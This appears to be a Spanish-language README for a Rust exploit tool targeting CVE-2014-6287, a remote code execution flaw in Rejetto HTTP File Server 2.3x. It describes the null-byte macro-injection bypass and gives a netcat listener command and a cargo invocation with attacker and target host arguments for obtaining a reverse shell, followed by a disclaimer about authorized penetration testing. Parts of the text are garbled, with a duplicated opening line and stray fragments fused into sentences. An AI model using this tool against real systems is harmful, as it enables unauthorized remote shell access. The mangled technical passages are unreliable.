
Una implementación en Rust del exploit CVE-2014-6287 dirigido a Rejetto HTTP File Server (HFS) versiones 2.3x anteriores a 2.3c.
Una implementación en Rust del exploit CVE-2014-6287 dirigido a Rejetto HTTP File Server (HFS) versiones 2.3x anteriores a 2.3c.
CVE-2014-6287 es una vulnerabilidad crítica de ejecución remota de código en Rejetto HTTP File Server (HFS).
La función findMacroMarker en en Rejetto HTTP File Server permite a atacantes remotos ejecutar programas arbitrarios mediante una secuencia en una acción de búsqueda. Esto permite a los atacantes eludir la validación de entrada e inyectar código malicioso que se ejecuta en el sistema objetivo.
parserLib.pas%00El exploit funciona de la siguiente manera:
%00){. y .}Antes de ejecutar el exploit, configure un listener en su máquina atacante para capturar la shell inversa:
# Reemplace <LPORT> con su puerto de escucha deseado
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: Su dirección IP local (máquina atacante)-p, --lport <LPORT>: Su puerto local para la shell inversa-r, --rhost <RHOST>: Dirección IP del objetivo (servidor HFS vulnerable)-t, --rport <RPORT>: Puerto del objetivo (por defecto: 80)Esta herramienta es solo para fines educativos y de pruebas de penetración autorizadas. Úsela de manera responsable y solo en sistemas que posea o para los que tenga permiso explícito